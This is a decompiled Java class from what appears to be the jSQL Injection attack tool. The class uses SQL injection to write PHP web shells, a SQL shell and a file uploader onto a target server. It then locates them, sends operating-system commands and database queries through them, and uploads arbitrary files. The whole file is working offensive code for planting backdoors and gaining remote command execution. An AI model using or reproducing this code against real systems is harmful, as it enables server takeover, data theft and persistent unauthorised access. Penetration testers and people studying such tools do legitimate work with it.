package com.jsql.model.accessible;

import com.jsql.model.InjectionModel;
import com.jsql.model.bean.util.Header;
import com.jsql.model.bean.util.Interaction;
import com.jsql.model.bean.util.Request;
import com.jsql.model.exception.JSqlException;
import com.jsql.model.suspendable.SuspendableGetRows;
import com.jsql.util.ConnectionUtil;
import com.jsql.util.HeaderUtil;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.UnsupportedEncodingException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLEncoder;
import java.util.ArrayList;
import java.util.Collections;
import java.util.EnumMap;
import java.util.Iterator;
import java.util.List;
import java.util.UUID;
import java.util.concurrent.CompletionService;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorCompletionService;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.TimeUnit;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.commons.lang3.StringUtils;
import org.apache.log4j.Logger;

/* loaded from: input_file:com/jsql/model/accessible/ResourceAccess.class */
public class ResourceAccess {
    private static final Logger LOGGER = Logger.getRootLogger();
    public final String filenameWebshell;
    public final String filenameSqlshell;
    public final String filenameUpload;
    private boolean isSearchAdminStopped = false;
    private boolean isScanStopped = false;
    private boolean isSearchFileStopped = false;
    private boolean readingIsAllowed = false;
    private List<CallableFile> callablesReadFile = new ArrayList();
    private InjectionModel injectionModel;

    public ResourceAccess(InjectionModel injectionModel) {
        this.injectionModel = injectionModel;
        this.filenameWebshell = "." + this.injectionModel.getVersionJsql() + ".jw.php";
        this.filenameSqlshell = "." + this.injectionModel.getVersionJsql() + ".js.php";
        this.filenameUpload = "." + this.injectionModel.getVersionJsql() + ".ju.php";
    }

    public int callAdminPage(CompletionService<CallableHttpHead> completionService, int i) {
        int i2 = i;
        try {
            CallableHttpHead callableHttpHead = completionService.take().get();
            if (callableHttpHead.isHttpResponseOk()) {
                Request request = new Request();
                request.setMessage(Interaction.CREATE_ADMIN_PAGE_TAB);
                request.setParameters(callableHttpHead.getUrl());
                this.injectionModel.sendToViews(request);
                i2++;
                LOGGER.debug("Found page: " + callableHttpHead.getUrl());
            }
        } catch (InterruptedException | ExecutionException e) {
            LOGGER.error("Interruption while checking Admin pages", e);
            Thread.currentThread().interrupt();
        }
        return i2;
    }

    public void logSearchAdminPage(int i, int i2, int i3) {
        Object[] objArr = new Object[5];
        objArr[0] = Integer.valueOf(i);
        objArr[1] = i > 1 ? 's' : StringUtils.EMPTY;
        objArr[2] = i3 != i2 ? "of " + i3 + " processed " : StringUtils.EMPTY;
        objArr[3] = Integer.valueOf(i2);
        objArr[4] = i2 > 1 ? 's' : StringUtils.EMPTY;
        String format = String.format("Found %s admin page%s %s on %s page%s searched", objArr);
        if (i > 0) {
            LOGGER.debug(format);
        } else {
            LOGGER.warn(format);
        }
    }

    public void createWebShell(String str, String str2) throws JSqlException, InterruptedException {
        if (isReadingAllowed()) {
            String replace = this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.web").replace(DataAccess.SHELL_LEAD, DataAccess.LEAD).replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
            String str3 = str;
            if (!str3.matches(".*/$")) {
                str3 = str3 + "/";
            }
            this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile(replace, str3 + this.filenameWebshell), "shell:create-web");
            String[] strArr = {StringUtils.EMPTY};
            try {
                String run = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead(str3 + this.filenameWebshell), strArr, false, 1, null, "wshell");
                if (StringUtils.isEmpty(run)) {
                    throw new JSqlException("payload integrity verification: Empty payload");
                }
                String str4 = str2;
                if (!str4.isEmpty()) {
                    str4 = str4.replaceAll("/*$", StringUtils.EMPTY) + "/";
                }
                String str5 = str4;
                if (StringUtils.isEmpty(str5)) {
                    str5 = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase();
                }
                if (run.indexOf(replace) <= -1) {
                    throw getIntegrityError(strArr);
                }
                LOGGER.debug("Web payload created into '" + str3 + this.filenameWebshell + "'");
                String replaceAll = str5.replaceAll("^https?://[^/]*", StringUtils.EMPTY);
                String replaceAll2 = "/".equals(replaceAll) ? str5.replaceAll("/+$", StringUtils.EMPTY) : str5.replace(replaceAll, StringUtils.EMPTY);
                String replaceAll3 = replaceAll.replaceAll("[^/]*$", StringUtils.EMPTY).replaceAll("/+", "/");
                ArrayList arrayList = new ArrayList();
                if (replaceAll3.split("/").length == 0) {
                    arrayList.add("/");
                }
                for (String str6 : replaceAll3.split("/")) {
                    arrayList.add(str6 + "/");
                }
                injectWebshell(str3, str4, replaceAll2, replaceAll3, arrayList);
            } catch (JSqlException e) {
                throw new JSqlException("injected payload does not match source", e);
            }
        }
    }

    private void injectWebshell(String str, String str2, String str3, String str4, List<String> list) throws InterruptedException {
        ExecutorService executor = this.injectionModel.getMediatorUtils().getThreadUtil().getExecutor("CallableCreateWebShell");
        ExecutorCompletionService executorCompletionService = new ExecutorCompletionService(executor);
        StringBuilder sb = new StringBuilder();
        Iterator<String> it = list.iterator();
        while (it.hasNext()) {
            sb.append(it.next());
            executorCompletionService.submit(new CallableHttpHead(str3 + sb.toString() + this.filenameWebshell, this.injectionModel, "wshell#run"));
        }
        String injectShell = injectShell(str2, str3, str4, executorCompletionService, list.size() * 1);
        executor.shutdown();
        executor.awaitTermination(5L, TimeUnit.SECONDS);
        if (injectShell == null) {
            LOGGER.warn("HTTP connection to Web payload not found");
            return;
        }
        Request request = new Request();
        request.setMessage(Interaction.CREATE_SHELL_TAB);
        request.setParameters(str.replace(this.filenameWebshell, StringUtils.EMPTY), injectShell);
        this.injectionModel.sendToViews(request);
    }

    private String injectShell(String str, String str2, String str3, CompletionService<CallableHttpHead> completionService, int i) {
        String str4 = null;
        for (int i2 = 0; i2 < i; i2++) {
            try {
                CallableHttpHead callableHttpHead = completionService.take().get();
                if (callableHttpHead.isHttpResponseOk()) {
                    str4 = callableHttpHead.getUrl();
                    if ((str.isEmpty() || !str4.replace(this.filenameWebshell, StringUtils.EMPTY).equals(str)) && !str4.replace(this.filenameWebshell, StringUtils.EMPTY).equals(str2 + str3)) {
                        LOGGER.debug("Connection to payload found at unexpected location '" + str4 + "'");
                    } else {
                        LOGGER.debug("Connection to payload found at expected location '" + str4 + "'");
                    }
                } else {
                    LOGGER.trace("Connection to payload not found at '" + callableHttpHead.getUrl() + "'");
                }
            } catch (InterruptedException | ExecutionException e) {
                LOGGER.error("Interruption while checking Web shell", e);
                Thread.currentThread().interrupt();
            }
        }
        return str4;
    }

    private String runCommandShell(String str) throws IOException {
        String str2;
        String str3;
        HttpURLConnection httpURLConnection = (HttpURLConnection) new URL(str).openConnection();
        httpURLConnection.setReadTimeout(this.injectionModel.getMediatorUtils().getConnectionUtil().getTimeout().intValue());
        httpURLConnection.setConnectTimeout(this.injectionModel.getMediatorUtils().getConnectionUtil().getTimeout().intValue());
        try {
            str2 = ConnectionUtil.getSource(httpURLConnection);
        } catch (Exception e) {
            str2 = StringUtils.EMPTY;
        }
        Matcher matcher = Pattern.compile("(?s)<SqLi>(.*)<iLQS>").matcher(str2);
        matcher.find();
        try {
            str3 = matcher.group(1);
        } catch (IllegalStateException e2) {
            str3 = StringUtils.EMPTY;
            LOGGER.warn("Incorrect response from Web shell", e2);
        }
        EnumMap enumMap = new EnumMap(Header.class);
        enumMap.put((EnumMap) Header.URL, (Header) str);
        enumMap.put((EnumMap) Header.POST, (Header) StringUtils.EMPTY);
        enumMap.put((EnumMap) Header.HEADER, (Header) StringUtils.EMPTY);
        enumMap.put((EnumMap) Header.RESPONSE, (Header) HeaderUtil.getHttpHeaders(httpURLConnection));
        enumMap.put((EnumMap) Header.SOURCE, (Header) str2);
        enumMap.put((EnumMap) Header.METADATA_PROCESS, (Header) "sshell#run");
        Request request = new Request();
        request.setMessage(Interaction.MESSAGE_HEADER);
        request.setParameters(enumMap);
        this.injectionModel.sendToViews(request);
        return str3;
    }

    public void runWebShell(String str, UUID uuid, String str2) {
        String str3 = StringUtils.EMPTY;
        try {
            try {
                str3 = runCommandShell(str2 + "?c=" + URLEncoder.encode(str.trim(), "ISO-8859-1"));
                if (StringUtils.isBlank(str3)) {
                    str3 = "No result.\nTry '" + str.trim() + " 2>&1' to get a system error message.\n";
                }
                Request request = new Request();
                request.setMessage(Interaction.GET_WEB_SHELL_RESULT);
                request.setParameters(uuid, str3);
                this.injectionModel.sendToViews(request);
            } catch (UnsupportedEncodingException e) {
                LOGGER.warn("Encoding command to ISO-8859-1 failed: " + e.getMessage(), e);
                Request request2 = new Request();
                request2.setMessage(Interaction.GET_WEB_SHELL_RESULT);
                request2.setParameters(uuid, str3);
                this.injectionModel.sendToViews(request2);
            } catch (IOException e2) {
                LOGGER.warn("Shell execution error: " + e2.getMessage(), e2);
                Request request3 = new Request();
                request3.setMessage(Interaction.GET_WEB_SHELL_RESULT);
                request3.setParameters(uuid, str3);
                this.injectionModel.sendToViews(request3);
            }
        } catch (Throwable th) {
            Request request4 = new Request();
            request4.setMessage(Interaction.GET_WEB_SHELL_RESULT);
            request4.setParameters(uuid, str3);
            this.injectionModel.sendToViews(request4);
            throw th;
        }
    }

    public void createSqlShell(String str, String str2, String str3, String str4) throws JSqlException, InterruptedException {
        if (isReadingAllowed()) {
            String replace = this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.sql").replace(DataAccess.SHELL_LEAD, DataAccess.LEAD).replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
            String str5 = str;
            if (!str5.matches(".*/$")) {
                str5 = str5 + "/";
            }
            this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile(replace, str5 + this.filenameSqlshell), "shell:create-sql");
            String[] strArr = {StringUtils.EMPTY};
            try {
                String run = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead(str5 + this.filenameSqlshell), strArr, false, 1, null, "sshell");
                if (StringUtils.isEmpty(run)) {
                    throw new JSqlException("payload integrity verification: Empty payload");
                }
                String str6 = str2;
                if (!str6.isEmpty()) {
                    str6 = str6.replaceAll("/*$", StringUtils.EMPTY) + "/";
                }
                String str7 = str6;
                if (StringUtils.isEmpty(str7)) {
                    str7 = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase();
                }
                if (run.indexOf(replace) <= -1) {
                    throw getIntegrityError(strArr);
                }
                LOGGER.debug("SQL payload created into '" + str5 + this.filenameSqlshell + "'");
                String replaceAll = str7.replaceAll("^https?://[^/]*", StringUtils.EMPTY);
                String replaceAll2 = "/".equals(replaceAll) ? str7.replaceAll("/+$", StringUtils.EMPTY) : str7.replace(replaceAll, StringUtils.EMPTY);
                String replaceAll3 = replaceAll.replaceAll("[^/]*$", StringUtils.EMPTY).replaceAll("/+", "/");
                ArrayList arrayList = new ArrayList();
                if (replaceAll3.split("/").length == 0) {
                    arrayList.add("/");
                }
                for (String str8 : replaceAll3.split("/")) {
                    arrayList.add(str8 + "/");
                }
                injectShell(str3, str4, str5, str6, replaceAll2, replaceAll3, arrayList);
            } catch (JSqlException e) {
                throw new JSqlException("injected payload does not match source", e);
            }
        }
    }

    private void injectShell(String str, String str2, String str3, String str4, String str5, String str6, List<String> list) throws InterruptedException {
        ExecutorService executor = this.injectionModel.getMediatorUtils().getThreadUtil().getExecutor("CallableCreateSqlShell");
        ExecutorCompletionService executorCompletionService = new ExecutorCompletionService(executor);
        StringBuilder sb = new StringBuilder();
        Iterator<String> it = list.iterator();
        while (it.hasNext()) {
            sb.append(it.next());
            executorCompletionService.submit(new CallableHttpHead(str5 + sb.toString() + this.filenameSqlshell, this.injectionModel, "sqlshell:create"));
        }
        int size = list.size() * 1;
        String str7 = null;
        for (int i = 0; i < size; i++) {
            try {
                CallableHttpHead callableHttpHead = (CallableHttpHead) executorCompletionService.take().get();
                if (callableHttpHead.isHttpResponseOk()) {
                    str7 = callableHttpHead.getUrl();
                    if ((str4.isEmpty() || !str7.replace(this.filenameSqlshell, StringUtils.EMPTY).equals(str4)) && !str7.replace(this.filenameSqlshell, StringUtils.EMPTY).equals(str5 + str6)) {
                        LOGGER.debug("Connection to payload found at unexpected location '" + str7 + "'");
                    } else {
                        LOGGER.debug("Connection to payload found at expected location '" + str7 + "'");
                    }
                } else {
                    LOGGER.trace("Connection to payload not found at '" + callableHttpHead.getUrl() + "'");
                }
            } catch (InterruptedException | ExecutionException e) {
                LOGGER.error("Interruption while checking SQL shell", e);
                Thread.currentThread().interrupt();
            }
        }
        executor.shutdown();
        executor.awaitTermination(5L, TimeUnit.SECONDS);
        if (str7 == null) {
            LOGGER.warn("HTTP connection to SQL payload not found");
            return;
        }
        Request request = new Request();
        request.setMessage(Interaction.CREATE_SQL_SHELL_TAB);
        request.setParameters(str3.replace(this.filenameSqlshell, StringUtils.EMPTY), str7, str, str2);
        this.injectionModel.sendToViews(request);
    }

    public void runSqlShell(String str, UUID uuid, String str2, String str3, String str4) {
        try {
            try {
                String runCommandShell = runCommandShell(String.format("%s?q=%s&u=%s&p=%s", str2, URLEncoder.encode(str.trim(), "ISO-8859-1"), str3, str4));
                if (runCommandShell.indexOf("<SQLr>") > -1) {
                    List<List<String>> parse = parse(runCommandShell);
                    if (parse.isEmpty()) {
                        Request request = new Request();
                        request.setMessage(Interaction.GET_SQL_SHELL_RESULT);
                        request.setParameters(uuid, runCommandShell, str);
                        this.injectionModel.sendToViews(request);
                        return;
                    }
                    runCommandShell = convert(parse, parseColumnLength(parse));
                } else if (runCommandShell.indexOf("<SQLm>") > -1) {
                    runCommandShell = runCommandShell.replace("<SQLm>", StringUtils.EMPTY) + StringUtils.LF;
                } else if (runCommandShell.indexOf("<SQLe>") > -1) {
                    runCommandShell = runCommandShell.replace("<SQLe>", StringUtils.EMPTY) + StringUtils.LF;
                }
                Request request2 = new Request();
                request2.setMessage(Interaction.GET_SQL_SHELL_RESULT);
                request2.setParameters(uuid, runCommandShell, str);
                this.injectionModel.sendToViews(request2);
            } catch (UnsupportedEncodingException e) {
                LOGGER.warn("Encoding command to ISO-8859-1 failed: " + e.getMessage(), e);
                Request request3 = new Request();
                request3.setMessage(Interaction.GET_SQL_SHELL_RESULT);
                request3.setParameters(uuid, StringUtils.EMPTY, str);
                this.injectionModel.sendToViews(request3);
            } catch (IOException e2) {
                LOGGER.warn("Shell execution error: " + e2.getMessage(), e2);
                Request request4 = new Request();
                request4.setMessage(Interaction.GET_SQL_SHELL_RESULT);
                request4.setParameters(uuid, StringUtils.EMPTY, str);
                this.injectionModel.sendToViews(request4);
            }
        } catch (Throwable th) {
            Request request5 = new Request();
            request5.setMessage(Interaction.GET_SQL_SHELL_RESULT);
            request5.setParameters(uuid, StringUtils.EMPTY, str);
            this.injectionModel.sendToViews(request5);
            throw th;
        }
    }

    private String convert(List<List<String>> list, List<Integer> list2) {
        StringBuilder sb = new StringBuilder("+");
        Iterator<Integer> it = list2.iterator();
        while (it.hasNext()) {
            sb.append("-" + StringUtils.repeat("-", it.next().intValue()) + "-+");
        }
        sb.append(StringUtils.LF);
        for (List<String> list3 : list) {
            sb.append("|");
            int i = 0;
            for (String str : list3) {
                sb.append(StringUtils.SPACE + str + StringUtils.repeat(StringUtils.SPACE, list2.get(i).intValue() - str.length()) + " |");
                i++;
            }
            sb.append(StringUtils.LF);
        }
        sb.append("+");
        Iterator<Integer> it2 = list2.iterator();
        while (it2.hasNext()) {
            sb.append("-" + StringUtils.repeat("-", it2.next().intValue()) + "-+");
        }
        sb.append(StringUtils.LF);
        return sb.toString();
    }

    private List<Integer> parseColumnLength(List<List<String>> list) {
        ArrayList arrayList = new ArrayList();
        for (int i = 0; i < list.get(0).size(); i++) {
            int i2 = i;
            Collections.sort(list, (list2, list3) -> {
                return ((String) list3.get(i2)).length() - ((String) list2.get(i2)).length();
            });
            arrayList.add(Integer.valueOf(list.get(0).get(i).length()));
        }
        return arrayList;
    }

    private List<List<String>> parse(String str) {
        ArrayList arrayList = new ArrayList();
        Matcher matcher = Pattern.compile("(?si)<tr>(<td>.*?</td>)</tr>").matcher(str);
        while (matcher.find()) {
            Matcher matcher2 = Pattern.compile("(?si)<td>(.*?)</td>").matcher(matcher.group(1));
            ArrayList arrayList2 = new ArrayList();
            arrayList.add(arrayList2);
            while (matcher2.find()) {
                arrayList2.add(matcher2.group(1));
            }
        }
        return arrayList;
    }

    public void uploadFile(String str, String str2, File file) throws JSqlException, IOException {
        if (isReadingAllowed()) {
            String replace = this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.upload").replace(DataAccess.SHELL_LEAD, DataAccess.LEAD);
            String str3 = str;
            if (!str3.matches(".*/$")) {
                str3 = str3 + "/";
            }
            this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile("<SqLi>" + replace + "<" + DataAccess.TRAIL + ">", str3 + this.filenameUpload), "upload");
            String[] strArr = {StringUtils.EMPTY};
            try {
                String run = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead(str3 + this.filenameUpload), strArr, false, 1, null, "upload");
                if (StringUtils.isEmpty(run)) {
                    throw new JSqlException("Bad payload integrity: Empty payload");
                }
                String str4 = str2;
                if (StringUtils.isEmpty(str4)) {
                    str4 = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().substring(0, this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().lastIndexOf(47) + 1);
                }
                if (run.indexOf(replace) <= -1) {
                    throw getIntegrityError(strArr);
                }
                LOGGER.debug(String.format("Upload payload deployed at '%s%s' in '%s%s'", str4, this.filenameUpload, str3, this.filenameUpload));
                URLConnection openConnection = new URL(str4 + "/" + this.filenameUpload).openConnection();
                openConnection.setDoOutput(true);
                FileInputStream fileInputStream = new FileInputStream(file);
                Throwable th = null;
                try {
                    try {
                        upload(file, "\r\n", openConnection, fileInputStream);
                        confirmUpload(file, str3, str4, openConnection);
                        if (fileInputStream != null) {
                            if (0 != 0) {
                                try {
                                    fileInputStream.close();
                                } catch (Throwable th2) {
                                    th.addSuppressed(th2);
                                }
                            } else {
                                fileInputStream.close();
                            }
                        }
                        Request request = new Request();
                        request.setMessage(Interaction.END_UPLOAD);
                        this.injectionModel.sendToViews(request);
                    } finally {
                    }
                } catch (Throwable th3) {
                    if (fileInputStream != null) {
                        if (th != null) {
                            try {
                                fileInputStream.close();
                            } catch (Throwable th4) {
                                th.addSuppressed(th4);
                            }
                        } else {
                            fileInputStream.close();
                        }
                    }
                    throw th3;
                }
            } catch (JSqlException e) {
                throw getIntegrityError(strArr);
            }
        }
    }

    private void upload(File file, String str, URLConnection uRLConnection, InputStream inputStream) throws IOException, JSqlException {
        byte[] bArr = new byte[inputStream.available()];
        if (inputStream.read(bArr) == -1) {
            throw new JSqlException("Error reading the file");
        }
        String str2 = (((StringUtils.EMPTY + "-----------------------------4664151417711" + str) + "Content-Disposition: form-data; name=\"u\"; filename=\"" + file.getName() + "\"" + str) + "Content-Type: binary/octet-stream" + str) + str;
        String str3 = StringUtils.EMPTY + str + "-----------------------------4664151417711--" + str;
        uRLConnection.setRequestProperty("Content-Type", "multipart/form-data; boundary=---------------------------4664151417711");
        uRLConnection.setRequestProperty("Content-Length", String.valueOf(str2.length() + str3.length() + bArr.length));
        OutputStream outputStream = uRLConnection.getOutputStream();
        Throwable th = null;
        try {
            try {
                outputStream.write(str2.getBytes());
                int i = 0;
                int i2 = 1024;
                do {
                    if (i + i2 > bArr.length) {
                        i2 = bArr.length - i;
                    }
                    outputStream.write(bArr, i, i2);
                    i += i2;
                } while (i < bArr.length);
                outputStream.write(str3.getBytes());
                outputStream.flush();
                if (outputStream != null) {
                    if (0 == 0) {
                        outputStream.close();
                        return;
                    }
                    try {
                        outputStream.close();
                    } catch (Throwable th2) {
                        th.addSuppressed(th2);
                    }
                }
            } catch (Throwable th3) {
                th = th3;
                throw th3;
            }
        } catch (Throwable th4) {
            if (outputStream != null) {
                if (th != null) {
                    try {
                        outputStream.close();
                    } catch (Throwable th5) {
                        th.addSuppressed(th5);
                    }
                } else {
                    outputStream.close();
                }
            }
            throw th4;
        }
    }

    private void confirmUpload(File file, String str, String str2, URLConnection uRLConnection) throws IOException {
        int read;
        InputStream inputStream = uRLConnection.getInputStream();
        Throwable th = null;
        try {
            try {
                byte[] bArr = new byte[512];
                StringBuilder sb = new StringBuilder();
                do {
                    read = inputStream.read(bArr);
                    if (read > 0) {
                        sb.append(new String(bArr, 0, read));
                    }
                } while (read > 0);
                if (sb.indexOf("SqLiy") > -1) {
                    LOGGER.debug(String.format("File '%s' uploaded into '%s'", file.getName(), str));
                } else {
                    LOGGER.warn(String.format("Upload file '%s' into '%s' failed", file.getName(), str));
                }
                EnumMap enumMap = new EnumMap(Header.class);
                enumMap.put((EnumMap) Header.URL, (Header) str2);
                enumMap.put((EnumMap) Header.POST, (Header) StringUtils.EMPTY);
                enumMap.put((EnumMap) Header.HEADER, (Header) StringUtils.EMPTY);
                enumMap.put((EnumMap) Header.RESPONSE, (Header) HeaderUtil.getHttpHeaders(uRLConnection));
                enumMap.put((EnumMap) Header.SOURCE, (Header) sb.toString());
                Request request = new Request();
                request.setMessage(Interaction.MESSAGE_HEADER);
                request.setParameters(enumMap);
                this.injectionModel.sendToViews(request);
                if (inputStream != null) {
                    if (0 == 0) {
                        inputStream.close();
                        return;
                    }
                    try {
                        inputStream.close();
                    } catch (Throwable th2) {
                        th.addSuppressed(th2);
                    }
                }
            } catch (Throwable th3) {
                th = th3;
                throw th3;
            }
        } catch (Throwable th4) {
            if (inputStream != null) {
                if (th != null) {
                    try {
                        inputStream.close();
                    } catch (Throwable th5) {
                        th.addSuppressed(th5);
                    }
                } else {
                    inputStream.close();
                }
            }
            throw th4;
        }
    }

    public boolean isReadingAllowed() throws JSqlException {
        if (this.injectionModel.getMediatorVendor().getVendor().instance().getModelYaml().getResource().getFile() == null) {
            LOGGER.warn(String.format("Reading file on %s is currently not supported", this.injectionModel.getMediatorVendor().getVendor()));
            return false;
        }
        String[] strArr = {StringUtils.EMPTY};
        String run = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlPrivilegeTest(), strArr, false, 1, null, "read");
        if (StringUtils.isEmpty(run)) {
            this.injectionModel.sendResponseFromSite("Can't read privilege", strArr[0].trim());
            Request request = new Request();
            request.setMessage(Interaction.MARK_FILE_SYSTEM_INVULNERABLE);
            this.injectionModel.sendToViews(request);
            this.readingIsAllowed = false;
        } else if ("false".equals(run)) {
            LOGGER.warn("Privilege FILE is not granted to current user, files can't be read");
            Request request2 = new Request();
            request2.setMessage(Interaction.MARK_FILE_SYSTEM_INVULNERABLE);
            this.injectionModel.sendToViews(request2);
            this.readingIsAllowed = false;
        } else {
            Request request3 = new Request();
            request3.setMessage(Interaction.MARK_FILE_SYSTEM_VULNERABLE);
            this.injectionModel.sendToViews(request3);
            this.readingIsAllowed = true;
        }
        return this.readingIsAllowed;
    }

    public void stopSearchingFile() {
        setSearchFileStopped(true);
        Iterator<CallableFile> it = getCallablesReadFile().iterator();
        while (it.hasNext()) {
            it.next().getSuspendableReadFile().stop();
        }
    }

    private JSqlException getIntegrityError(String[] strArr) {
        return new JSqlException("Wrong payload integrity: " + strArr[0].trim().replace("\\n", "\\\\\\n"));
    }

    public boolean isSearchAdminStopped() {
        return this.isSearchAdminStopped;
    }

    public void setSearchAdminStopped(boolean z) {
        this.isSearchAdminStopped = z;
    }

    public void setScanStopped(boolean z) {
        this.isScanStopped = z;
    }

    public boolean isReadingIsAllowed() {
        return this.readingIsAllowed;
    }

    public void setReadingIsAllowed(boolean z) {
        this.readingIsAllowed = z;
    }

    public boolean isScanStopped() {
        return this.isScanStopped;
    }

    public boolean isSearchFileStopped() {
        return this.isSearchFileStopped;
    }

    public void setSearchFileStopped(boolean z) {
        this.isSearchFileStopped = z;
    }

    public List<CallableFile> getCallablesReadFile() {
        return this.callablesReadFile;
    }

    public void setCallablesReadFile(List<CallableFile> list) {
        this.callablesReadFile = list;
    }
}
